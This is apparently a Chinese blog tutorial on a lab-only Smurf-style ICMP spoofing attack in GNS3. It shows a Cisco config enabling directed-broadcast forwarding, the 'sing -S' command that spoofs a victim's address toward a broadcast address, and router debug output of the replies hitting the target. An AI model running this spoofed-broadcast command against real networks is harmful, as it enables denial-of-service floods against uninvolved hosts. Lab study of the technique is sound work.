Ping Spoofing

“定向广播”特指 IP 主机位全为 1 的数据包，路由器不转发全网广播（255.255.255.255），但是思科路由器可以转发定向广播，只是默认不转发而已，使用 ip directed-broadcast 接口命令来实现转发定向广播。

我们来利用这一特性，在 Linux 下实现 Ping Spoofing 的攻击。

环境为 BT4 + GNS3，R1、R2 和 R3 模拟 PC，不要使用 VPCs，或 Windows 主机实验，因为 Windows 系统上的 ping 程序不对多个回应进行解包，收到第一个回应包以后就丢弃后面的，同样 Windows 的系统默认也不回应广播地址的包。

Attacker 使用 BT4，IP 地址为 192.168.10.1，网关为 192.168.10.254；R0 四个接口地址为 e0/0 为 192.168.30.254；e0/1 为 192.168.10.254；e0/2 为 192.168..20.254；R1 的 e0/0 为192.168.20.1；R2 的 e0/0 为 192.168.20.2；R3 的 e0/0 为 192.168.30.1；

R0 的 e0/2 接口上开启定向广播转发功能：
interface Ethernet0/2
ip address 192.168.20.254 255.255.255.0
ip directed-broadcast
end

R3 为 Attacker 攻击的目标，在 BT4 中，找到 sing 工具，使用命令：sing -S 192.168.30.1 192.168.20.255
解释：-S 定义 ping 的源地址，也就是攻击对象，后面跟广播地址，ping 整个网段，都返回 echo reply，去往 192.168.30.1。

现象：
R3# debug ip packet
Dec 4 15:52:27.113: IP: s=192.168.10.254 (Ethernet0/0), d=192.168.30.1, len 36
Dec 4 15:52:27.117: IP: s=192.168.20.1 (Ethernet0/0), d=192.168.30.1, len 36
Dec 4 15:52:27.121: IP: s=192.168.20.2 (Ethernet0/0), d=192.168.30.1, len 36
R3#

sing 工具介绍：SING stands for ‘Send ICMP Nasty Garbage’. It is a tool that sends ICMP packets fully customized from command line. Its main purpose is to replace the ping command but adding certain enhancements (Fragmentation, spoofing,…)

网址：http://sourceforge.net/projects/sing/

Related posts:

1. Ping 命令的返回结果